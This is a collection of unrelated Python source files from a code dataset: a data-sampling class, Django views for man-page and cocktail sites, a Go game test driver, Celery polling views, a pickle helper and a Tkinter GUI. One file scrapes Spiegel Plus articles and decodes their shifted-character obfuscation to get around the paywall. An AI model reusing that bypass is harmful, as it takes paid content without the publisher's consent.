{"seq_id":"81248919","text":"import math\n\nimport numpy as np\nimport pandas as pd\n\n\nclass PointShift:\n\n def __init__(self, local_variance: int):\n self.data = None\n self.local_variance = local_variance\n self.response_column = None\n\n def fit(self, X, response_column=None, **kwargs):\n self.data = X\n self.response_column = response_column\n return self\n\n def sample(self, size: int):\n assert size > self.data.shape[0]\n k = self.determine_k(size)\n result = self.generate_points(k)\n return result.sample(size)\n\n def fit_and_sample_with_labels(self, X: pd.DataFrame, y: np.ndarray):\n # DataFrame.insert mutates in place and returns None, so X must not be rebound\n X.insert(0, \"y\", y, allow_duplicates=True)\n self.data = X\n # remember the label column so _shift repeats it instead of jittering it\n self.response_column = \"y\"\n\n def determine_k(self, sample_size):\n if sample_size < self.data.shape[0]:\n return 0\n return math.ceil(sample_size / self.data.shape[0])\n\n def generate_points(self, total_size: int):\n df = pd.DataFrame(data=None, columns=self.data.columns)\n for row_idx in range(self.data.shape[0]):\n df = df.append(self._shift(row_idx, self.data, self.response_column, self.local_variance, total_size))\n return df\n\n def _shift(self, row_idx: int, data: pd.DataFrame, response_column: str, local_variance: int, size):\n new_data = pd.DataFrame()\n for col_idx in range(data.shape[1]):\n value = data.iloc[row_idx, col_idx]\n if data.columns[col_idx] != response_column:\n new_data.insert(len(new_data.columns), data.columns[col_idx], np.random.normal(value, local_variance, size), True)\n else:\n new_data.insert(len(new_data.columns), response_column, np.repeat(a=value, repeats=size), True)\n return new_data\n\n def _conditional_copy(self, original_data: pd.DataFrame, deep_copy: bool):\n if deep_copy:\n return original_data.copy()\n return original_data\n","sub_path":"src/main/generators/PointShift.py","file_name":"PointShift.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"563515098","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.db.models import Count\nfrom django.contrib.postgres.search import TrigramSimilarity\n\nfrom .models import Package, ManPage, SymbolicLink, UpdateLog, SoelimError\nfrom .utils import reverse_man_url, paginate, extract_headings\n\ndef index(request):\n count_man_pages = ManPage.objects.count()\n count_symlinks = SymbolicLink.objects.count()\n count_all_pkgs = Package.objects.count()\n count_pkgs_with_mans = ManPage.objects.aggregate(Count(\"package_id\", distinct=True))[\"package_id__count\"]\n last_updates = UpdateLog.objects.order_by(\"-id\")[:5]\n context = {\n \"count_man_pages\": count_man_pages,\n \"count_symlinks\": count_symlinks,\n \"count_pkgs_with_mans\": count_pkgs_with_mans,\n \"count_pkgs_without_mans\": count_all_pkgs - count_pkgs_with_mans,\n \"last_updates\": 
last_updates,\n }\n return render(request, "index.html", context)\n\ndef simple_view(request, *, template_name):\n if template_name not in {"about", "dev"}:\n raise Http404()\n return render(request, "{}.html".format(template_name), {})\n\ndef listing(request, *, repo=None, pkgname=None):\n sorting = request.GET.get(\"sorting\", \"alphabetical\")\n lang = request.GET.get(\"lang\")\n section = request.GET.get(\"section\")\n\n if sorting == \"alphabetical\":\n sorting_columns = (\"name\", \"lang\", \"section\")\n elif sorting == \"-alphabetical\":\n sorting_columns = (\"-name\", \"-lang\", \"-section\")\n elif sorting == \"section\":\n sorting_columns = (\"section\", \"name\", \"lang\")\n elif sorting == \"-section\":\n sorting_columns = (\"-section\", \"-name\", \"-lang\")\n elif sorting == \"lang\":\n sorting_columns = (\"lang\", \"name\", \"section\")\n elif sorting == \"-lang\":\n sorting_columns = (\"-lang\", \"-name\", \"-section\")\n else:\n # HttpResponse is not an exception, so it must be returned, not raised\n return HttpResponse(\"Unknown sorting parameter: {}\".format(sorting), status=400)\n\n db_pkg = None\n man_pages = ManPage.objects.order_by( *sorting_columns )\n\n if pkgname:\n # check that such package exists\n if repo:\n query = Package.objects.filter(name=pkgname, repo=repo)\n else:\n query = Package.objects.filter(name=pkgname)\n if len(query) == 0:\n if repo:\n raise Http404(\"The package {} does not exist in the {} repository.\".format(pkgname, repo))\n else:\n raise Http404(\"The package {} does not exist in the database.\".format(pkgname))\n elif len(query) == 1:\n db_pkg = query[0]\n else:\n return HttpResponse(\n \"The package {} exists in multiple repositories ({}) and ambiguous listings are not implemented.\"\n .format(pkgname, \", \".join(pkg.repo for pkg in query)),\n status=501)\n man_pages = man_pages.filter(package__name=pkgname)\n if lang:\n man_pages = man_pages.filter(lang=lang)\n if section:\n man_pages = man_pages.filter(section=section)\n\n # list of symbolic links in a package\n if pkgname:\n symlinks_sorting_columns = []\n for c in sorting_columns:\n if \"name\" in c:\n c = c.replace(\"name\", \"from_name\")\n elif \"section\" in c:\n c = c.replace(\"section\", \"from_section\")\n symlinks_sorting_columns.append(c)\n symlinks = SymbolicLink.objects.order_by( *symlinks_sorting_columns ).filter(package__name=pkgname)\n symlinks_count = SymbolicLink.objects.filter(package__name=pkgname).count()\n else:\n symlinks = []\n symlinks_count = 0\n\n # template rendering time is dominated by the number of links, symlinks have 2 links per row\n if symlinks_count > 125:\n man_pages = paginate(request, \"page\", man_pages, 250)\n symlinks = paginate(request, \"page_symlinks\", symlinks, 125)\n else:\n man_pages = paginate(request, \"page\", man_pages, 500)\n symlinks = paginate(request, \"page_symlinks\", symlinks, 500)\n\n context = {\n \"url_repo\": repo,\n \"url_pkgname\": pkgname,\n \"pkg\": db_pkg,\n \"man_pages\": man_pages,\n \"symlinks\": symlinks,\n }\n return render(request, \"listing.html\", context)\n\ndef _get_package_filter(repo, pkgname):\n if repo is None and pkgname is None:\n return {}\n elif repo is None:\n return {\"package__name\": pkgname}\n else:\n return {\"package__name\": pkgname, \"package__repo\": repo}\n\n# Maybe all these checks should include repo/pkgname when specified in the URL,\n# but this seems enough to parse the URL correctly. 
debiman actually only checks\n# if given section/lang is in some static set.\ndef _exists_name_section(name, section):\n return ManPage.objects.filter(name=name, section=section).exists() or \\\n SymbolicLink.objects.filter(from_name=name, from_section=section).exists()\n\ndef _exists_language(lang):\n # cross-language symlinks are not allowed\n return ManPage.objects.filter(lang=lang).exists()\n\ndef _exists_name_language(name, lang):\n # cross-language symlinks are not allowed\n return ManPage.objects.filter(name=name, lang=lang).exists()\n\ndef _exists_name_section_language(name, section, lang):\n return ManPage.objects.filter(name=name, section=section, lang=lang).exists() or \\\n SymbolicLink.objects.filter(from_name=name, from_section=section, lang=lang).exists()\n\ndef _parse_man_name_section_lang(url_snippet, *, force_lang=None):\n # Man page names can contain dots, so we need to parse from the right. There are still\n # some ambiguities for shortcuts like gimp-2.8 (shortcut for gimp-2.8(1)), jclient.pl\n # (shortcut for jclient.pl.1.en) etc., but we'll either detect that the page given by\n # the greedy algorithm does not exist or the user can specify the section or language\n # to get the version they want.\n # NOTE: The force_lang parameter can be used to ignore the lang specified in the URL.\n # This is useful for redirections to the default language if we find out that there\n # is no version of the page in the user-specified language.\n parts = url_snippet.split(\".\")\n if len(parts) == 1:\n # name\n return url_snippet, None, None\n name = \".\".join(parts[:-1])\n # the last part can be a section or a language\n if _exists_name_section(name, parts[-1]):\n # any.name.section: language cannot come before section, so we're done\n return name, parts[-1], None\n elif len(parts) == 2:\n if force_lang is not None and not _exists_language(parts[-1]):\n # we still need to validate the input\n return url_snippet, None, None\n if _exists_name_language(name, force_lang or parts[-1]):\n # name.lang\n return name, None, force_lang or parts[-1]\n else:\n # dotted.name\n return url_snippet, None, None\n elif _exists_language(parts[-1]):\n name2 = \".\".join(parts[:-2])\n if _exists_name_section_language(name2, parts[-2], force_lang or parts[-1]):\n # name.section.lang\n return name2, parts[-2], force_lang or parts[-1]\n if _exists_name_language(name, force_lang or parts[-1]):\n # name.with.dots.lang\n return name, None, force_lang or parts[-1]\n # name.with.dots\n return url_snippet, None, None\n else:\n # name.with.dots\n return url_snippet, None, None\n\ndef try_redirect_or_404(request, repo, pkgname, man_name, man_section, lang, output_type, name_section_lang):\n if man_section is None:\n query = SymbolicLink.objects.filter(from_name=man_name, lang=lang, **_get_package_filter(repo, pkgname))\n # TODO: we're trying to guess the newest version, but lexical ordering is too weak\n query = query.order_by(\"from_section\", \"-package__version\")[:1]\n else:\n query = SymbolicLink.objects.filter(from_section=man_section, from_name=man_name, lang=lang, **_get_package_filter(repo, pkgname))\n # TODO: we're trying to guess the newest version, but lexical ordering is too weak\n query = query.order_by(\"-package__version\")[:1]\n\n if len(query) > 0:\n symlink = query[0]\n # repo and pkgname are not added, the target might be in a different package\n url = reverse_man_url(\"\", \"\", symlink.to_name, symlink.to_section, symlink.lang, output_type)\n return HttpResponseRedirect(url)\n\n # Try the 
default language before giving 404.\n # This is important because we don't know if the user explicitly specified\n # the language or followed a link to a localized page, which does not exist.\n # TODO: we could parse the referer header and redirect only links coming from this site\n #\n # Note: if page \"foo\" does not exist in language \"bar\", we'll get \"foo.bar\" as the\n # man_name, so we need to re-parse the URL and force the default language.\n parsed_name, parsed_section, parsed_lang = _parse_man_name_section_lang(name_section_lang, force_lang=\"en\")\n if (parsed_name != man_name or parsed_section != man_section) and parsed_lang == \"en\":\n url = reverse_man_url(repo, pkgname, parsed_name, parsed_section, \"en\", output_type)\n return HttpResponseRedirect(url)\n # otherwise page does not exist in en -> 404\n\n man_page = man_name\n if man_section:\n man_page += \".\" + man_section\n\n if repo and pkgname:\n raise Http404(\"No manual entry for {} found in package {}/{}.\".format(man_page, repo, pkgname))\n elif pkgname:\n raise Http404(\"No manual entry for {} found in package {}.\".format(man_page, pkgname))\n else:\n raise Http404(\"No manual entry for {} found in any package.\".format(man_page))\n\ndef man_page(request, *, repo=None, pkgname=None, name_section_lang=None, url_output_type=None):\n # validate input parameters\n if repo is not None and pkgname is None:\n return HttpResponse(\"Specifying repo ({}) without a pkg name should not be allowed.\".format(repo), status=500)\n if not name_section_lang:\n return HttpResponse(\"The name of the man page was not specified.\", status=400)\n assert \"/\" not in name_section_lang\n man_name, man_section, url_lang = _parse_man_name_section_lang(name_section_lang)\n lang = url_lang or \"en\"\n serve_output_type = url_output_type or \"html\"\n if serve_output_type not in {\"html\", \"txt\", \"raw\"}:\n return HttpResponse(\"Serving of {} content type is not implemented yet.\".format(serve_output_type), status=501)\n\n # find the man page and package containing it\n if man_section is None:\n query = ManPage.objects.filter(name=man_name, lang=lang, **_get_package_filter(repo, pkgname))\n # TODO: we're trying to guess the newest version, but lexical ordering is too weak\n query = query.order_by(\"section\", \"-package__version\")[:1]\n else:\n query = ManPage.objects.filter(section=man_section, name=man_name, lang=lang, **_get_package_filter(repo, pkgname))\n # TODO: we're trying to guess the newest version, but lexical ordering is too weak\n query = query.order_by(\"-package__version\")[:1]\n\n if len(query) == 0:\n return try_redirect_or_404(request, repo, pkgname, man_name, man_section, lang, url_output_type, name_section_lang)\n else:\n db_man = query[0]\n if man_section is None:\n return HttpResponseRedirect(reverse_man_url(repo, pkgname, man_name, db_man.section, url_lang, url_output_type))\n db_pkg = db_man.package\n\n if serve_output_type == \"raw\":\n return HttpResponse(db_man.content.raw, content_type=\"text/plain; charset=utf8\")\n\n try:\n converted_content = db_man.get_converted(serve_output_type)\n except SoelimError:\n raise Http404(\"The requested manual contains a .so reference to an unknown file.\")\n\n if serve_output_type == \"txt\":\n return HttpResponse(converted_content, content_type=\"text/plain; charset=utf8\")\n\n # links to other packages providing the same manual\n other_packages = []\n query = ManPage.objects.values(\"package__repo\", \"package__name\") \\\n .filter(section=db_man.section, name=man_name, 
lang=lang) \\\n .exclude(package__id=db_pkg.id) \\\n .union(SymbolicLink.objects.values(\"package__repo\", \"package__name\") \\\n .filter(from_section=db_man.section, from_name=man_name, lang=lang) \\\n .exclude(package__id=db_pkg.id)) \\\n .order_by(\"package__repo\", \"package__name\")\n for row in query:\n info = {\n \"repo\": row[\"package__repo\"],\n \"name\": row[\"package__name\"],\n }\n other_packages.append(info)\n\n # links to other languages - might lead to different package, even if the user specified repo or pkgname\n other_languages = set()\n query = ManPage.objects.values(\"lang\") \\\n .filter(section=db_man.section, name=man_name) \\\n .exclude(lang=lang) \\\n .union(SymbolicLink.objects.values(\"lang\") \\\n .filter(from_section=db_man.section, from_name=man_name) \\\n .exclude(lang=lang))\n for row in query:\n other_languages.add(row[\"lang\"])\n\n # links to other sections - might lead to different package, even if the user specified repo or pkgname\n other_sections = set()\n query = ManPage.objects.values(\"section\") \\\n .filter(name=man_name, lang=lang) \\\n .exclude(section=db_man.section) \\\n .union(SymbolicLink.objects.values(\"from_section\") \\\n .filter(from_name=man_name, lang=lang) \\\n .exclude(from_section=db_man.section))\n for row in query:\n other_sections.add(row[\"section\"])\n\n # this is pretty fast, no caching\n headings = extract_headings(converted_content)\n\n context = {\n \"lang\": lang, # used in base.html\n \"url_repo\": repo,\n \"url_pkgname\": pkgname,\n \"url_lang\": url_lang,\n \"url_output_type\": url_output_type,\n \"pkg\": db_pkg,\n \"man\": db_man,\n \"man_page_content\": converted_content,\n \"headings\": headings,\n \"other_packages\": other_packages,\n \"other_languages\": sorted(other_languages),\n \"other_sections\": sorted(other_sections),\n }\n\n return render(request, \"man_page.html\", context)\n\n# references:\n# https://www.postgresql.org/docs/current/static/pgtrgm.html\n# https://www.postgresql.org/docs/current/static/textsearch.html\n# https://docs.djangoproject.com/en/1.11/ref/contrib/postgres/search/\ndef search(request):\n term = request.GET[\"q\"]\n\n man_filter = {}\n\n if \"lang\" in request.GET:\n man_filter[\"lang__iexact\"] = request.GET[\"lang\"]\n\n man_results = ManPage.objects.values(\"name\", \"section\", \"lang\", \"package__repo\", \"package__name\") \\\n .filter(name__trigram_similar=term, **man_filter) \\\n .annotate(similarity=TrigramSimilarity(\"name\", term)) \\\n .union(SymbolicLink.objects.values(\"from_name\", \"from_section\", \"lang\", \"package__repo\", \"package__name\")\n .filter(from_name__trigram_similar=term, **man_filter)\n .annotate(similarity=TrigramSimilarity(\"from_name\", term)),\n all=True) \\\n .order_by(\"-similarity\", \"name\", \"section\", \"lang\")\n man_results = paginate(request, \"page_man\", man_results, 20)\n\n# pkg_results = Package.objects.values(\"repo\", \"name\", \"description\") \\\n# .filter(name__trigram_similar=term) \\\n# .annotate(similarity=TrigramSimilarity(\"name\", term)) \\\n# .order_by(\"-similarity\", \"name\", \"repo\")\n pkg_results = Package.objects.only(\"repo\", \"name\").extra(\n select={\n \"desc_snippet\": \"ts_headline('english', description, plainto_tsquery(%s))\",\n \"rank\": \"similarity(name, %s) + 2 * ts_rank(to_tsvector('english', description), plainto_tsquery(%s), 32)\",\n },\n where=[\"name %% %s OR to_tsvector('english', description) @@ plainto_tsquery(%s)\"],\n params=[term, term],\n select_params=[term, term, term],\n 
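# the rank expression blends trigram name similarity with ts_rank full-text relevance (weighted 1:2)\n 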
order_by=('-rank', ),\n )\n pkg_results = paginate(request, \"page_pkg\", pkg_results, 20)\n\n context = {\n \"man_results\": man_results,\n \"pkg_results\": pkg_results,\n }\n\n return render(request, \"search.html\", context)\n","sub_path":"archweb_manpages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"259556649","text":"import json\nimport sys\nfrom go_referee import GoReferee\n\ncommand_list = []\ndecoder = json.JSONDecoder()\n\nif not sys.stdin.isatty():\n file = sys.stdin.read()\n s_len = len(file)\n end = 0\n\n while end != s_len:\n try:\n obj, end = decoder.raw_decode(file, idx=end)\n command_list.append(obj)\n except ValueError:\n end += 1\n\nresult_list = []\n\n# print(command_list)\n\nReferee = GoReferee()\nnames = 0\n\nfor command in command_list:\n if names != 2:\n output = Referee.assign_player(command)\n names += 1\n if output:\n # print(output)\n result_list += output\n else:\n # actions here, return board history before every action\n result_list.append(Referee.get_history())\n # print(Referee.get_history())\n output = Referee.perform_action(command)\n if output:\n # print(output)\n # someone won\n result_list.append(output)\n break\n\n# print('end here')\n# print(Referee.history[0].get_board_repr())\n\n\nprint(json.dumps(result_list))","sub_path":"Desktop/python_go_complete_game/go_complete_game_python/Deliverables copy/6/6.2/test_driver.py","file_name":"test_driver.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"536718144","text":"# Create your views here.\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.template import RequestContext\nfrom django.contrib.auth.models import User\nimport elesma.models\nimport settings\nfrom djangoratings.models import Vote\nfrom django.contrib.auth.decorators import login_required\nfrom django.forms import ModelForm, CheckboxSelectMultiple, ModelMultipleChoiceField\nfrom uni_form.helpers import FormHelper, Submit, Reset, Layout, Fieldset, Row, HTML\nfrom django.template.defaultfilters import slugify\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\ndef user(request, username=None):\n user = get_object_or_404(User, username=username)\n votes = Vote.objects.filter(user=user)\n return render_to_response('elesma/profile.html',\n { 'object': user,\n 'votes': votes,\n },\n context_instance=RequestContext(request))\n\nclass RecipeForm(ModelForm):\n ingredients = ModelMultipleChoiceField(queryset=elesma.models.Ingredient.objects.all().order_by('name'),\n required=True,\n widget=CheckboxSelectMultiple)\n\n class Meta:\n model = elesma.models.Recipe\n fields = ('name', 'description', 'directions', 'category', 'container', 'ingredients')\n\n helper = FormHelper()\n layout = Layout(Fieldset('Describe your Drink','name', 'category', 'container', 'description'),\n Fieldset('Record the Recipe', 'directions','ingredients'),\n )\n helper.add_layout(layout)\n helper.add_input(Submit('create', 'Create Cocktail'))\n\n@login_required\ndef create_recipe(request):\n if request.method == 'POST':\n formset = RecipeForm(request.POST, request.FILES)\n if formset.is_valid():\n recipe = formset.save(commit=False)\n recipe.slug = slugify(recipe.name)\n try:\n 
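# save() may raise here (e.g. on a duplicate slug), but the finally clause still issues the redirect\n 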
recipe.save()\n finally:\n return HttpResponseRedirect(reverse('elesma.views.recipe', kwargs={'slug': recipe.slug}))\n else:\n formset = RecipeForm()\n return render_to_response('elesma/create_recipe.html',\n { 'form': formset,\n },\n context_instance=RequestContext(request))\n\ndef recipe(request, slug):\n recipe = get_object_or_404(elesma.models.Recipe, slug=slug)\n vote = recipe.rating.get_rating_for_user(request.user, request.META['REMOTE_ADDR'])\n recent_votes = recipe.rating.get_ratings()[0:3]\n setattr(recipe.rating, 'score', int(recipe.rating.get_rating()))\n return render_to_response('elesma/recipe.html',\n { 'object': recipe,\n 'vote': vote,\n 'recent_votes': recent_votes,\n },\n context_instance=RequestContext(request))\n\ndef random_drink(request):\n recipe = elesma.models.Recipe.objects.all().order_by('?')[0]\n return HttpResponseRedirect(reverse('elesma.views.recipe', kwargs={'slug': recipe.slug}))\n\ndef ingredient(request):\n # @TODO: handle more than one ingredient\n for ingredient_name in request.GET.getlist('ingredient'):\n ingredient = get_object_or_404(elesma.models.Ingredient, name__iexact=ingredient_name)\n recipes = ingredient.recipe_set.all()\n return render_to_response('elesma/ingredients.html',\n { 'objects': [ingredient],\n 'recipes': recipes,\n },\n context_instance=RequestContext(request))\n return HttpResponseNotFound()\n\n\n\n\ndef user_leaderboard(request):\n profiles = elesma.models.UserProfile.objects.all().order_by('-votes')[:10]\n return render_to_response('elesma/user_leaderboard.html',\n { 'objects': profiles },\n context_instance=RequestContext(request))\n\ndef recipe_leaderboard(request):\n qs = elesma.models.Recipe.objects.extra(select={\n 'rating_rank': '((100/%s*rating_score/(rating_votes+%s))+100)/2' % (elesma.models.Recipe.rating.range,\n elesma.models.Recipe.rating.weight+1)\n })\n qs = qs.order_by('-rating_rank')[:10]\n return render_to_response('elesma/recipe_leaderboard.html',\n { 'objects': qs },\n context_instance=RequestContext(request))\n\ndef random_drink_404(request):\n cocktail = elesma.models.Recipe(name=\"404 Cocktail\",\n directions=\"Carefully check the URL you intended to discover, mix in the ingredients, and go.\",\n category=elesma.models.Category(name=\"When-You-Typo Cocktail\"),\n container=elesma.models.Container(name=request.META.get('HTTP_USER_AGENT', 'Your Browser')),\n )\n resp = render_to_response('404.html',\n {'object': cocktail },\n context_instance=RequestContext(request))\n resp.status_code = 404\n return resp\n","sub_path":"elesma_project/apps/elesma/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"106660631","text":"from django.views.generic.base import TemplateView\nfrom django.views.generic.edit import FormView\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.cache import cache\nfrom .forms import CrawlForm\nfrom celery.result import AsyncResult\nimport json\n\n\nSESSION_EXPIRE_TIME = 30\n\n\nclass AdminView(FormView):\n template_name = 'dsp_index/admin_page.html'\n form_class = CrawlForm\n success_url = '/admin/'\n\n def form_valid(self, form):\n \"\"\"This method is called when valid form data has been POSTed.\"\"\"\n # Crawl documents\n crawl_task = form.crawl()\n # Set session\n self.request.session.set_expiry(SESSION_EXPIRE_TIME)\n self.request.session['crawl_task_id'] = crawl_task.id\n\n return super(AdminView, self).form_valid(form)\n\n\nclass 
LoginView(TemplateView):\n template_name = 'dsp_index/login_page.html'\n\n\ndef poll_task_state(request):\n if request.is_ajax():\n if 'task_id' in request.POST.keys() and request.POST['task_id']:\n task_id = request.POST['task_id']\n task = AsyncResult(task_id)\n data = {'state': task.state, 'result': task.result}\n else:\n data = 'No task_id in the request.'\n else:\n data = 'This is not an ajax request.'\n\n json_data = json.dumps(data)\n return HttpResponse(json_data, content_type='application/json')\n\n\ndef get_last_crawl(request):\n if request.method == 'GET':\n data = cache.get('last_crawl_time'), cache.get('last_crawl_tid')\n if data is None:\n data = 'No crawl history found'\n else:\n data = 'This is not a GET request.'\n json_data = json.dumps(data)\n return HttpResponse(json_data, content_type='application/json')\n","sub_path":"dsp_index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"339764526","text":"from pprint import pprint\n\nimport requests\nimport json\nfrom numpy.lib.recfunctions import recursive_fill_fields\nfrom bs4 import BeautifulSoup\n\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n\n try:\n import unicodedata\n unicodedata.numeric(s)\n return True\n except (TypeError, ValueError):\n pass\n\n return False\n\n\nclass Scrape:\n site = 'http://www.spiegel.de'\n json = []\n\n def extract_information_to_json(self):\n for teaser_article in self.teaser_content():\n author = teaser_article.find_next('span', {'class': 'author'}).string\n title = teaser_article.find_next('a', title=True).get('title')\n link = teaser_article.find_next('a', href=True).get('href')\n content = self.scrape_article_content(link)\n\n self.json.append(\n {\n 'title': title,\n 'author': author,\n 'link': link,\n 'content': content\n }\n )\n\n #pprint(self.json)\n\n def teaser_content(self):\n req = requests.get(self.site + '/spiegelplus/')\n if req.status_code == 200:\n text = req.text\n\n return BeautifulSoup(text, \"html.parser\").find_all('p', {'class': ['article-intro']})\n\n def scrape_article_content(self, link):\n article_content = []\n article_req = requests.get(self.site + link)\n if article_req.status_code == 200:\n article_text = article_req.text\n\n soup = BeautifulSoup(article_text, \"html.parser\")\n content = soup.find_all(True, {'class': 'article-section'})\n\n for parts in content:\n clear_text = parts.find_all('p', recursive=False)\n obfuscated_text = parts.find_all('p', {'class': 'obfuscated'})\n\n article_content.extend(self.strip_clear_text(clear_text))\n article_content.extend(self.undo_caeser(obfuscated_text))\n\n return article_content\n\n def strip_clear_text(self, clear_text):\n return (''.join(s.strings).strip() for s in clear_text)\n\n def undo_caeser(self, obfuscated_text):\n for ciph in obfuscated_text:\n s = \" \".join(ciph.strings).strip()\n yield ''.join([chr(ord(c) - 1) if c != ' ' else ' ' for c in s])\n","sub_path":"src/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"313702762","text":"\"\"\"\r\nsimple module to save and load compressed pickle files\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import\r\nimport pickle\r\nimport bz2\r\nimport sys\r\n\r\n \r\ndef save(filename, myobj):\r\n \"\"\"\r\n save object to file using pickle\r\n \r\n @param filename: name of 
destination file\r\n @type filename: str\r\n @param myobj: object to save (has to be pickleable)\r\n @type myobj: obj\r\n \"\"\"\r\n \r\n try:\r\n f = bz2.BZ2File(filename, 'wb')\r\n except IOError as details:\r\n sys.stderr.write('File ' + filename + ' cannot be written\\n')\r\n # write() needs a string, not the exception object itself\r\n sys.stderr.write(str(details) + '\\n')\r\n return\r\n \r\n pickle.dump(myobj, f, protocol=2)\r\n f.close()\r\n \r\n \r\n \r\ndef load(filename):\r\n \"\"\"\r\n Load from filename using pickle\r\n \r\n @param filename: name of file to load from\r\n @type filename: str\r\n \"\"\"\r\n \r\n try:\r\n f = bz2.BZ2File(filename, 'rb')\r\n except IOError as details:\r\n sys.stderr.write('File ' + filename + ' cannot be read\\n')\r\n sys.stderr.write(str(details) + '\\n')\r\n return\r\n \r\n myobj = pickle.load(f)\r\n f.close()\r\n return myobj\r\n\r\n\r\n","sub_path":"fastlmm/util/pickle_io.py","file_name":"pickle_io.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"440798517","text":"from tkinter import *\nfrom tkinter import messagebox\nimport threading\n\nimport tkinter_utils\n\n# Window with Label scanning for results... counter for next automatic update..\n# Show forecast button pumps a window with forecasts for the next 2 hours and 1 day ahead\n\n\nclass LabRecommendIoT:\n def __init__(self):\n self.created_thread = threading.main_thread()\n self.main_window = Tk()\n self.main_window.overrideredirect(1)\n self.button_forecast = None\n self.label_report = None\n self.label_report_status = None\n self.button_exit = None\n self.label_mail_service = None\n self.label_report_header = None\n self.label_info = None\n self.init_window()\n tkinter_utils.center_window(self.main_window, 450, 300)\n self.recently_temperature_status = None\n self.label_signature = None\n self.forecast_next_day_temperature_status = None\n self.forecast_2hour_temperature_status = None\n self.recently_noise_status = None\n self.forecast_next_day_noise_status = None\n self.forecast_2hour_noise_status = None\n self.temperature_updated = False\n self.noise_updated = False\n\n def run(self):\n self.main_window.mainloop()\n\n def init_window(self):\n self.button_forecast = Button(self.main_window, text=\"Show Forecast\", command=self.show_forecast)\n self.button_forecast.place(x=100, y=250)\n\n self.button_exit = Button(self.main_window, text=\"Exit Lab\", command=self.exit_lab)\n self.button_exit.place(x=300, y=250)\n\n self.label_info = Label(self.main_window, text=\"Welcome to Lab Recommendation!\")\n self.label_info.place(x=130, y=30)\n\n self.label_signature = Label(self.main_window, text=\"Niv&Gal Lab Recommendation Systems\")\n self.label_signature.place(x=5, y=0)\n\n self.label_report_header = Label(self.main_window, text='Report:')\n self.label_report_header.place(x=200, y=100)\n\n self.label_report_status = Label(self.main_window,\n text=\"Fetching lab conditions for you right now.. 
Hold on\")\n self.label_report_status.place(x=100, y=50)\n\n self.label_report = Label(self.main_window)\n\n self.label_mail_service = Label(self.main_window,\n text=\"For our mail service, contact us at nivjamp@walla.com.\")\n self.label_mail_service.place(x=5, y=280)\n\n self.main_window.configure(background='cyan')\n for child_control in self.main_window.winfo_children():\n child_control.configure(background='cyan')\n child_control['font'] = 'Helvetica 10'\n\n self.label_report_header['font'] = 'Helvetica 10 bold underline'\n self.label_signature['font'] = 'calibri 10 italic'\n self.label_mail_service['font'] = 'calibri 10 italic'\n\n def set_temperature(self, temperature_status, query_name):\n if query_name == 'recently':\n self.recently_temperature_status = temperature_status\n elif query_name == 'next_day':\n self.forecast_next_day_temperature_status = temperature_status\n elif query_name == 'next_2_hours':\n self.forecast_2hour_temperature_status = temperature_status\n\n self.temperature_updated = True\n report = self.show_updated_report_if_available(self.recently_temperature_status,\n self.recently_noise_status, False)\n if report is not None:\n self.label_report['text'] = report\n\n def set_noise(self, noise_status, query_name):\n if query_name == 'recently':\n self.recently_noise_status = noise_status\n elif query_name == 'next_day':\n self.forecast_next_day_noise_status = noise_status\n elif query_name == 'next_2_hours':\n self.forecast_2hour_noise_status = noise_status\n\n self.noise_updated = True\n report = self.show_updated_report_if_available(self.recently_temperature_status,\n self.recently_noise_status, False)\n if report is not None:\n self.label_report['text'] = report\n\n def set_light(self, temperature_status, query_name):\n pass\n\n def set_proximity(self, proximity_status, query_name):\n pass\n\n def show_forecast(self):\n forecast_2hours = self.show_updated_report_if_available(\n self.forecast_next_day_temperature_status, self.forecast_next_day_noise_status, True)\n forecast_tomorrow = self.show_updated_report_if_available(\n self.forecast_2hour_temperature_status, self.forecast_2hour_noise_status, True)\n if forecast_tomorrow is not None and forecast_2hours is not None:\n messagebox.showinfo(\"Forecast\", \"Forecast in 2 hours: {0}\\nForecast tomorrow: {1}\"\n .format(forecast_2hours, forecast_tomorrow))\n else:\n messagebox.showinfo(\"Forecast not ready\", \"Hold on! Forecast not ready yet.\")\n\n def exit_lab(self):\n self.main_window.withdraw()\n self.main_window.quit()\n\n def show_updated_report_if_available(self, temp_to_check, noise_to_check, is_forecast):\n if not (self.noise_updated and self.temperature_updated):\n return None\n self.label_report_status['text'] = 'Report ready! Automatic updates every 30 seconds.'\n is_normal_temp = temp_to_check == 'normal'\n is_normal_noise = noise_to_check == 'normal'\n\n if is_normal_noise and is_normal_temp:\n report = 'Lab conditions are good! 
